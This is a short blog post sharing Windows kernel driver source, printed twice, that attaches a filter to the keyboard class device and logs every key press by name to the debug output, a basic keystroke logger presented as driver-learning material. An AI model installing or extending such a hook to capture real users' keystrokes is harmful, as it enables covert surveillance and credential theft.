Author:cxhcxh
Learn bypass driver, Please commment more.
Code:
//////////////////////////////////////////////////////////////////////////
//作者:cxh
//
//功能:键盘过滤,监视
//
//邮箱:cxh852456@163.com
//////////////////////////////////////////////////////////////////////////
#include <ntddk.h>
#include <ntddkbd.h>
PDEVICE_OBJECT selfdevice,targetdevice;;
PIRP pcancel;
#define PAGEDCODE code_seg("PAGE")
#define LOCKEDCODE code_seg()
#define INITCODE code_seg("INIT")
#pragma LOCKEDCODE
NTSTATUS CompeleteRoutin(IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
)
{
PKEYBOARD_INPUT_DATA key;
if (Irp->PendingReturned==TRUE)
{
IoMarkIrpPending(Irp);
}
key = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;
_try{
if (key->Flags==KEY_MAKE && key->MakeCode)
{
switch (key->MakeCode)
{
case 0x1:
DbgPrint("ESC KeyDown");
break;
case 0x2:
DbgPrint("1 KeyDown");
break;
case 0x3:
DbgPrint("2 KeyDown");
break;
case 0x4:
DbgPrint("3 KeyDown");
break;
case 0x5:
DbgPrint("4 KeyDown");
break;
case 0x6:
DbgPrint("5 KeyDown");
break;
case 0x7:
DbgPrint("6 KeyDown");
break;
case 0x8:
DbgPrint("7 KeyDown");
break;
case 0x9:
DbgPrint("8 KeyDown");
break;
case 0xA:
DbgPrint("9 KeyDown");
break;
case 0xB:
DbgPrint("0 KeyDown");
break;
case 0xC:
DbgPrint("- KeyDown");
break;
case 0xD:
DbgPrint("= KeyDown");
break;
case 0xE:
DbgPrint("BACKSPACE KeyDown");
break;
case 0xF:
DbgPrint("TAB KeyDown");
break;
case 0x10:
DbgPrint("Q KeyDown");
break;
case 0x11:
DbgPrint("W KeyDown");
break;
case 0x12:
DbgPrint("E KeyDown");
break;
case 0x13:
DbgPrint("R KeyDown");
break;
case 0x14:
DbgPrint("T KeyDown");
break;
case 0x15:
DbgPrint("Y KeyDown");
break;
case 0x16:
DbgPrint("U KeyDown");
break;
case 0x17:
DbgPrint("I KeyDown");
break;
case 0x18:
DbgPrint("O KeyDown");
break;
case 0x19:
DbgPrint("P KeyDown");
break;
case 0x1A:
DbgPrint("[ KeyDown");
break;
case 0x1B:
DbgPrint("] KeyDown");
break;
case 0x2B:
DbgPrint("\\ KeyDown");
break;
case 0x1D:
DbgPrint("LEFT CTRL KeyDown");
break;
case 0x1E:
DbgPrint("A KeyDown");
break;
case 0x1F:
DbgPrint("S KeyDown");
break;
case 0x20:
DbgPrint("D KeyDown");
break;
case 0x21:
DbgPrint("F KeyDown");
break;
case 0x22:
DbgPrint("G KeyDown");
break;
case 0x23:
DbgPrint("H KeyDown");
break;
case 0x24:
DbgPrint("J KeyDown");
break;
case 0x25:
DbgPrint("K KeyDown");
break;
case 0x26:
DbgPrint("L KeyDown");
break;
case 0x27:
DbgPrint("; KeyDown");
break;
case 0x28:
DbgPrint("' KeyDown");
break;
case 0x29:
DbgPrint("` KeyDown");
break;
case 0x2A:
DbgPrint("LEFT SHIFT KeyDown");
break;
case 0x1C:
DbgPrint("ENTER KeyDown");
break;
case 0x2C:
DbgPrint("Z KeyDown");
break;
case 0x2D:
DbgPrint("X KeyDown");
break;
case 0x2E:
DbgPrint("C KeyDown");
break;
case 0x2F:
DbgPrint("V KeyDown");
break;
case 0x30:
DbgPrint("B KeyDown");
break;
case 0x31:
DbgPrint("N KeyDown");
break;
case 0x32:
DbgPrint("M KeyDown");
break;
case 0x33:
DbgPrint(", KeyDown");
break;
case 0x34:
DbgPrint(". KeyDown");
break;
case 0x35:
DbgPrint("/ KeyDown");
break;
case 0x36:
DbgPrint("RIGHT SHIFT KeyDown");
break;
case 0x37:
DbgPrint("* KeyDown");
break;
case 0x38:
DbgPrint("LEFT ALT KeyDown");
break;
case 0x39:
DbgPrint("SPACE KeyDown");
break;
case 0x3A:
DbgPrint("CAP LOCK KeyDown");
break;
case 0x3B:
DbgPrint("F1 KeyDown");
break;
case 0x3C:
DbgPrint("F2 KeyDown");
break;
case 0x3D:
DbgPrint("F3 KeyDown");
break;
case 0x3E:
DbgPrint("F4 KeyDown");
break;
case 0x3F:
DbgPrint("F5 KeyDown");
break;
case 0x40:
DbgPrint("F6 KeyDown");
break;
case 0x41:
DbgPrint("F7 KeyDown");
break;
case 0x42:
DbgPrint("F8 KeyDown");
break;
case 0x43:
DbgPrint("F9 KeyDown");
break;
case 0x44:
DbgPrint("F10 KeyDown");
break;
case 0x45:
DbgPrint("NumLock KeyDown");
break;
case 0x46:
DbgPrint("小键盘 / KeyDown");
break;
case 0x47:
DbgPrint("小键盘 7 KeyDown");
break;
case 0x48:
DbgPrint("小键盘 8 KeyDown");
break;
case 0x49:
DbgPrint("小键盘 9 KeyDown");
break;
case 0x4A:
DbgPrint("小键盘 - KeyDown");
break;
case 0x4B:
DbgPrint("小键盘 4 KeyDown");
break;
case 0x4C:
DbgPrint("小键盘 5 KeyDown");
break;
case 0x4D:
DbgPrint("小键盘 6 KeyDown");
break;
case 0x4E:
DbgPrint("小键盘 + KeyDown");
break;
case 0x4F:
DbgPrint("小键盘 1 KeyDown");
break;
case 0x50:
DbgPrint("小键盘 2 KeyDown");
break;
case 0x51:
DbgPrint("小键盘 3 KeyDown");
break;
case 0x52:
DbgPrint("小键盘 0 KeyDown");
break;
case 0x53:
DbgPrint("小键盘 . KeyDown");
break;
case 0x57:
DbgPrint("F11 KeyDown");
break;
case 0x58:
DbgPrint("F12 KeyDown");
break;
default:
DbgPrint("%X",key->MakeCode);
break;
}
}
}_except(EXCEPTION_CONTINUE_EXECUTION)
{
DbgPrint("%x",GetExceptionCode());
}
return STATUS_CONTINUE_COMPLETION;
}
#pragma PAGEDCODE
NTSTATUS
Dispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
IoSkipCurrentIrpStackLocation(Irp);
return IoCallDriver(targetdevice,Irp);
}
NTSTATUS
DispatchRead(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
PIO_STACK_LOCATION irpsp;
NTSTATUS s;
PKEYBOARD_INPUT_DATA key;
//DbgPrint("read");
pcancel = Irp;
IoCopyCurrentIrpStackLocationToNext(Irp);
// IoSkipCurrentIrpStackLocation(Irp);
IoSetCompletionRoutine(Irp,CompeleteRoutin,NULL,TRUE,TRUE,TRUE);
return IoCallDriver(targetdevice,Irp);
}
VOID
Unload(
IN PDRIVER_OBJECT DriverObject
)
{
IoCancelIrp(pcancel);
IoDetachDevice(targetdevice);
IoDeleteDevice(selfdevice);
DbgPrint("Driver Unload!");
}
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
PDEVICE_OBJECT device;
PFILE_OBJECT file;
NTSTATUS s;
UNICODE_STRING DeviceName;
ULONG i;
DbgPrint("Driver loaded!");
DriverObject->DriverUnload = Unload;
for (i=0;i<=IRP_MJ_MAXIMUM_FUNCTION;i++)
{
DriverObject->MajorFunction[i] = Dispatch;
}
DriverObject->MajorFunction[IRP_MJ_READ]=DispatchRead;
RtlInitUnicodeString(&DeviceName,L"\\Device\\KeyboardClass0");
s = IoGetDeviceObjectPointer(&DeviceName,FILE_ALL_ACCESS,&file,&device);
if (!NT_SUCCESS(s))
{
DbgPrint("Get Device error!");
return s;
}
s = IoCreateDevice(DriverObject,
0,
NULL,
device->Type,
device->Characteristics,
TRUE,
&selfdevice
);
if (!NT_SUCCESS(s))
{
ObDereferenceObject(file);
DbgPrint("Create Device Faile!!!");
return s;
}
targetdevice = IoAttachDeviceToDeviceStack(selfdevice,device);
if (!targetdevice)
{
IoDeleteDevice(selfdevice);
ObDereferenceObject(file);
DbgPrint("attach faile");
return STATUS_INSUFFICIENT_RESOURCES;
}
selfdevice->DeviceType = targetdevice->DeviceType;
selfdevice->Characteristics = targetdevice->Characteristics;
selfdevice->Flags &=~DO_DEVICE_INITIALIZING;
selfdevice->Flags |=(targetdevice->Flags & (DO_DIRECT_IO | DO_BUFFERED_IO));
ObDereferenceObject(file);
DbgPrint("SUCCESS");
return STATUS_SUCCESS;
}
//作者:cxh
//
//功能:键盘过滤,监视
//
//邮箱:cxh852456@163.com
//////////////////////////////////////////////////////////////////////////
#include <ntddk.h>
#include <ntddkbd.h>
PDEVICE_OBJECT selfdevice,targetdevice;;
PIRP pcancel;
#define PAGEDCODE code_seg("PAGE")
#define LOCKEDCODE code_seg()
#define INITCODE code_seg("INIT")
#pragma LOCKEDCODE
NTSTATUS CompeleteRoutin(IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
)
{
PKEYBOARD_INPUT_DATA key;
if (Irp->PendingReturned==TRUE)
{
IoMarkIrpPending(Irp);
}
key = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;
_try{
if (key->Flags==KEY_MAKE && key->MakeCode)
{
switch (key->MakeCode)
{
case 0x1:
DbgPrint("ESC KeyDown");
break;
case 0x2:
DbgPrint("1 KeyDown");
break;
case 0x3:
DbgPrint("2 KeyDown");
break;
case 0x4:
DbgPrint("3 KeyDown");
break;
case 0x5:
DbgPrint("4 KeyDown");
break;
case 0x6:
DbgPrint("5 KeyDown");
break;
case 0x7:
DbgPrint("6 KeyDown");
break;
case 0x8:
DbgPrint("7 KeyDown");
break;
case 0x9:
DbgPrint("8 KeyDown");
break;
case 0xA:
DbgPrint("9 KeyDown");
break;
case 0xB:
DbgPrint("0 KeyDown");
break;
case 0xC:
DbgPrint("- KeyDown");
break;
case 0xD:
DbgPrint("= KeyDown");
break;
case 0xE:
DbgPrint("BACKSPACE KeyDown");
break;
case 0xF:
DbgPrint("TAB KeyDown");
break;
case 0x10:
DbgPrint("Q KeyDown");
break;
case 0x11:
DbgPrint("W KeyDown");
break;
case 0x12:
DbgPrint("E KeyDown");
break;
case 0x13:
DbgPrint("R KeyDown");
break;
case 0x14:
DbgPrint("T KeyDown");
break;
case 0x15:
DbgPrint("Y KeyDown");
break;
case 0x16:
DbgPrint("U KeyDown");
break;
case 0x17:
DbgPrint("I KeyDown");
break;
case 0x18:
DbgPrint("O KeyDown");
break;
case 0x19:
DbgPrint("P KeyDown");
break;
case 0x1A:
DbgPrint("[ KeyDown");
break;
case 0x1B:
DbgPrint("] KeyDown");
break;
case 0x2B:
DbgPrint("\\ KeyDown");
break;
case 0x1D:
DbgPrint("LEFT CTRL KeyDown");
break;
case 0x1E:
DbgPrint("A KeyDown");
break;
case 0x1F:
DbgPrint("S KeyDown");
break;
case 0x20:
DbgPrint("D KeyDown");
break;
case 0x21:
DbgPrint("F KeyDown");
break;
case 0x22:
DbgPrint("G KeyDown");
break;
case 0x23:
DbgPrint("H KeyDown");
break;
case 0x24:
DbgPrint("J KeyDown");
break;
case 0x25:
DbgPrint("K KeyDown");
break;
case 0x26:
DbgPrint("L KeyDown");
break;
case 0x27:
DbgPrint("; KeyDown");
break;
case 0x28:
DbgPrint("' KeyDown");
break;
case 0x29:
DbgPrint("` KeyDown");
break;
case 0x2A:
DbgPrint("LEFT SHIFT KeyDown");
break;
case 0x1C:
DbgPrint("ENTER KeyDown");
break;
case 0x2C:
DbgPrint("Z KeyDown");
break;
case 0x2D:
DbgPrint("X KeyDown");
break;
case 0x2E:
DbgPrint("C KeyDown");
break;
case 0x2F:
DbgPrint("V KeyDown");
break;
case 0x30:
DbgPrint("B KeyDown");
break;
case 0x31:
DbgPrint("N KeyDown");
break;
case 0x32:
DbgPrint("M KeyDown");
break;
case 0x33:
DbgPrint(", KeyDown");
break;
case 0x34:
DbgPrint(". KeyDown");
break;
case 0x35:
DbgPrint("/ KeyDown");
break;
case 0x36:
DbgPrint("RIGHT SHIFT KeyDown");
break;
case 0x37:
DbgPrint("* KeyDown");
break;
case 0x38:
DbgPrint("LEFT ALT KeyDown");
break;
case 0x39:
DbgPrint("SPACE KeyDown");
break;
case 0x3A:
DbgPrint("CAP LOCK KeyDown");
break;
case 0x3B:
DbgPrint("F1 KeyDown");
break;
case 0x3C:
DbgPrint("F2 KeyDown");
break;
case 0x3D:
DbgPrint("F3 KeyDown");
break;
case 0x3E:
DbgPrint("F4 KeyDown");
break;
case 0x3F:
DbgPrint("F5 KeyDown");
break;
case 0x40:
DbgPrint("F6 KeyDown");
break;
case 0x41:
DbgPrint("F7 KeyDown");
break;
case 0x42:
DbgPrint("F8 KeyDown");
break;
case 0x43:
DbgPrint("F9 KeyDown");
break;
case 0x44:
DbgPrint("F10 KeyDown");
break;
case 0x45:
DbgPrint("NumLock KeyDown");
break;
case 0x46:
DbgPrint("小键盘 / KeyDown");
break;
case 0x47:
DbgPrint("小键盘 7 KeyDown");
break;
case 0x48:
DbgPrint("小键盘 8 KeyDown");
break;
case 0x49:
DbgPrint("小键盘 9 KeyDown");
break;
case 0x4A:
DbgPrint("小键盘 - KeyDown");
break;
case 0x4B:
DbgPrint("小键盘 4 KeyDown");
break;
case 0x4C:
DbgPrint("小键盘 5 KeyDown");
break;
case 0x4D:
DbgPrint("小键盘 6 KeyDown");
break;
case 0x4E:
DbgPrint("小键盘 + KeyDown");
break;
case 0x4F:
DbgPrint("小键盘 1 KeyDown");
break;
case 0x50:
DbgPrint("小键盘 2 KeyDown");
break;
case 0x51:
DbgPrint("小键盘 3 KeyDown");
break;
case 0x52:
DbgPrint("小键盘 0 KeyDown");
break;
case 0x53:
DbgPrint("小键盘 . KeyDown");
break;
case 0x57:
DbgPrint("F11 KeyDown");
break;
case 0x58:
DbgPrint("F12 KeyDown");
break;
default:
DbgPrint("%X",key->MakeCode);
break;
}
}
}_except(EXCEPTION_CONTINUE_EXECUTION)
{
DbgPrint("%x",GetExceptionCode());
}
return STATUS_CONTINUE_COMPLETION;
}
#pragma PAGEDCODE
NTSTATUS
Dispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
IoSkipCurrentIrpStackLocation(Irp);
return IoCallDriver(targetdevice,Irp);
}
NTSTATUS
DispatchRead(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
PIO_STACK_LOCATION irpsp;
NTSTATUS s;
PKEYBOARD_INPUT_DATA key;
//DbgPrint("read");
pcancel = Irp;
IoCopyCurrentIrpStackLocationToNext(Irp);
// IoSkipCurrentIrpStackLocation(Irp);
IoSetCompletionRoutine(Irp,CompeleteRoutin,NULL,TRUE,TRUE,TRUE);
return IoCallDriver(targetdevice,Irp);
}
VOID
Unload(
IN PDRIVER_OBJECT DriverObject
)
{
IoCancelIrp(pcancel);
IoDetachDevice(targetdevice);
IoDeleteDevice(selfdevice);
DbgPrint("Driver Unload!");
}
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
PDEVICE_OBJECT device;
PFILE_OBJECT file;
NTSTATUS s;
UNICODE_STRING DeviceName;
ULONG i;
DbgPrint("Driver loaded!");
DriverObject->DriverUnload = Unload;
for (i=0;i<=IRP_MJ_MAXIMUM_FUNCTION;i++)
{
DriverObject->MajorFunction[i] = Dispatch;
}
DriverObject->MajorFunction[IRP_MJ_READ]=DispatchRead;
RtlInitUnicodeString(&DeviceName,L"\\Device\\KeyboardClass0");
s = IoGetDeviceObjectPointer(&DeviceName,FILE_ALL_ACCESS,&file,&device);
if (!NT_SUCCESS(s))
{
DbgPrint("Get Device error!");
return s;
}
s = IoCreateDevice(DriverObject,
0,
NULL,
device->Type,
device->Characteristics,
TRUE,
&selfdevice
);
if (!NT_SUCCESS(s))
{
ObDereferenceObject(file);
DbgPrint("Create Device Faile!!!");
return s;
}
targetdevice = IoAttachDeviceToDeviceStack(selfdevice,device);
if (!targetdevice)
{
IoDeleteDevice(selfdevice);
ObDereferenceObject(file);
DbgPrint("attach faile");
return STATUS_INSUFFICIENT_RESOURCES;
}
selfdevice->DeviceType = targetdevice->DeviceType;
selfdevice->Characteristics = targetdevice->Characteristics;
selfdevice->Flags &=~DO_DEVICE_INITIALIZING;
selfdevice->Flags |=(targetdevice->Flags & (DO_DIRECT_IO | DO_BUFFERED_IO));
ObDereferenceObject(file);
DbgPrint("SUCCESS");
return STATUS_SUCCESS;
}
No comments:
Post a Comment